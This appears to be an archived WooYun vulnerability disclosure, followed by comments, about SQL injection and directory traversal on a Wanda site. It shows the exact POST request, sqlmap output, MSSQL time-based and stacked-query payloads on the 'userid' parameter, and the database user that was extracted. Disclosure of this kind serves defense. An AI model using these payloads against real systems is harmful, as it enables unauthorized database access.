万达某站SQL注入及目录遍历

2015年8月16日19:55:44评论334 views字数 206阅读0分41秒阅读模式

摘要

2014-11-20：细节已通知厂商并且等待厂商处理中
2014-11-20：厂商已经确认，细节仅向厂商公开
2014-11-30：细节向核心白帽子及相关领域专家公开
2014-12-10：细节向普通白帽子公开
2014-12-20：细节向实习白帽子公开
2015-01-04：细节向公众公开

漏洞概要关注数(7) 关注此漏洞

缺陷编号： WooYun-2014-83981

漏洞标题：万达某站SQL注入及目录遍历

漏洞作者： Mr.leo

提交时间： 2014-11-20 14:51

公开时间： 2015-01-04 14:52

漏洞类型： SQL注射漏洞

危害等级：中

自评Rank： 10

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

万达某站SQL注入及目录遍历

详细说明：

mtodo.wanda.cn

问题1，sql注入

userid参数没有过滤导致注射

POST /ServiceMobile.asmx/GetRule HTTP/1.1

Content-Length: 59

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://mtodo.wanda.cn/

Host: mtodo.wanda.cn

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*

userid=1

[14:43:32] [INFO] parsing HTTP request from 'd:/post3.txt'

[14:43:32] [INFO] resuming back-end DBMS 'microsoft sql server'

[14:43:32] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: POST

Parameter: userid

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: userid=1'; WAITFOR DELAY '0:0:5';--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: userid=1' WAITFOR DELAY '0:0:5'--

---

[14:43:37] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows

web application technology: ASP.NET, ASP.NET 4.0.30319

back-end DBMS: Microsoft SQL Server 2008

[14:43:37] [INFO] fetching current user

[14:43:37] [WARNING] time-based comparison needs larger statistical model. Makin

g a few dummy requests, please wait..

[14:44:36] [WARNING] it is very important not to stress the network adapter's ba

ndwidth during usage of time-based queries

[14:44:56] [INFO] adjusting time delay to 4 seconds due to good response times

[14:45:38] [INFO] adjusting time delay to 3 seconds due to good response times

andataskdb_user

current user: 'wandataskdb_user'

问题二，目录遍历

漏洞证明：

已经证明

修复方案：

1、过滤参数

2、加强权限

版权声明：转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-11-20 17:23

厂商回复：

感谢同学的关注与贡献！马上联系业务部门整改。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-11-20 15:11 | zzR ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红＊＊联盟欢迎你－0-)

2

斯高一滴丝乃

1# 回复此人
2014-11-20 15:15 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢！！)

2

说人话！！

2# 回复此人
2014-11-20 15:19 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)

1

LZ又出来作恶

3# 回复此人
2014-11-20 15:21 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢！！)

1

@p4ssw0rd 年底了妹子要看电影总要有点啥表示啊

4# 回复此人
2014-11-20 16:18 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒，呵呵哒，么蛤蛤~)

1

@Mr.leo +1，妹子也要看电影，也挖了个万达的洞==、

5# 回复此人
2014-11-20 17:27 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢！！)

2

@大连万达集团股份有限公司真速度，点赞！！

6# 回复此人
2014-11-20 17:28 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢！！)

1

擦，还差6分1000，- -

7# 回复此人
2014-11-20 17:39 | 大连万达集团(乌云厂商)

1

您老几位在这儿讨论挖洞换电影票，不妥吧

8# 回复此人
2014-11-20 18:25 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)

1

再使点劲儿楼上的化妆品就到了

9# 回复此人
2014-11-20 18:37 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢！！)

1

@p4ssw0rd 我能说现在没有化妆品了吗

10# 回复此人
2014-11-20 18:50 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒，呵呵哒，么蛤蛤~)

2

@Mr.leo 你万达的洞到手几rank？我的走了小厂商啊，只有2rank

11# 回复此人
2014-11-20 18:54 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢！！)

1

@g0odnight 两个小，一个大，一起16

12# 回复此人
2014-11-20 19:25 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒，呵呵哒，么蛤蛤~)

1

@Mr.leo 给有大厂商流程了？为什么我总是走小厂商啊

13# 回复此人

漏洞概要 关注数(7) 关注此漏洞